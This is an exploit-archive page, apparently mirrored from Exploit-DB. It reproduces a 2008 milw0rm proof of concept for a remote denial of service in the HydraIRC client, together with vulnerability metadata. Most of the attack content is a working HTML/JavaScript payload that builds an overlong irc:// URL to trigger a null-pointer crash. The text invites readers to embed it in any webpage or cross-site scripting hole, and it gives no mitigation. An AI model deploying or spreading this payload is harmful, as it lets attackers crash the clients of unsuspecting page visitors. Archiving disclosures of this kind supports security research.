header-logo
Suggest Exploit
vendor:
HydraIRC
by:
milw0rm.com
7.5
CVSS
HIGH
Null Pointer Dereference
476
CWE
Product Name: HydraIRC
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: all browsers
2008

HydraIRC Remote Denial Of Service Poc

Include this in any webpage or xss & see it with any browser, wait ~15sec, and boom.

Mitigation:

N/A
Source

Exploit-DB raw data:

############################################################
# Vendor : http://www.hydrairc.com/
# Remote : Yes
# Impact : Remote crash
# Bug : Null Pointer Dereference
# Working on : all browsers
#
#  Include this in any webpage or xss & see it with any browser , wait ~15sec, and boom.
#
# PoC :
#
<html>
<head> <title>HydraIRC Remote Denial Of Service Poc </title></head>
<body>
<script>
var site = 'irc://127.0.0.1/'
var buf = 'A';
     while (buf.length <= 560) buf = buf + 'A';
document.location.href=site +buf
</script>
</body>
</html>

# milw0rm.com [2008-08-04]